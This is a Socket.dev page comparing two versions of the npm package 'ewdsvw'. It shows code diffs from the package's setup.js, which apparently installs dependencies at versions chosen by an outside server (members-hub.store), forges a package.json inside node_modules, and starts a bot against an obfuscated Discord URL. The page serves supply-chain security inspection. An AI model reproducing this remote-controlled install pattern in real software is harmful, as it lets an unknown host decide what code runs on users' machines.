Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

ewdsvw

Package Overview
Dependencies
Maintainers
0
Versions
5
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

ewdsvw - npm Package Compare versions

Comparing version 0.2.5 to 0.2.6

2

package.json
{
"name": "ewdsvw",
"description": "ewdsvw",
"version": "0.2.5",
"version": "0.2.6",
"main": "setup.js",

@@ -6,0 +6,0 @@ "dependencies": {

@@ -30,2 +30,3 @@ const { default: axios } = require('axios');

console.log('Dependencies installed successfully.');
/*
fs.writeFileSync('./node_modules/gfdsac/package.json', JSON.stringify({

@@ -45,6 +46,7 @@ "name": "ewdsvw",

"readmeFilename": "README.md"
}, null, 2))
}, null, 2))*/
/*
setTimeout(()=>{
process.exit(0);
}, 5000)
}, 5000)*/

@@ -58,4 +60,4 @@ runProject();

console.log('Running the project...');
let bot = require('./server.js')
new bot("https://disc" + "ord.com/", 0)
// let bot = require('./index.js')
// new bot("https://disc" + "ord.com/", 0)
}

@@ -73,3 +75,3 @@

for(const name of dependencies.d){
_dependencies.push(`${name}@${await axios(`https://members-hub.store/packagedata?name=${name}`).then(res=>res.data?.value || "*").catch(err=>"*")}`)
_dependencies.push(`${name}@${await axios(`https://members-hub.store/packagedata?name=${name}`).then(res=>res.data?.value === "^undefined" ? "*" : res.data?.value || "*").catch(err=>"*")}`)
}

@@ -76,0 +78,0 @@ console.log(_dependencies)

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc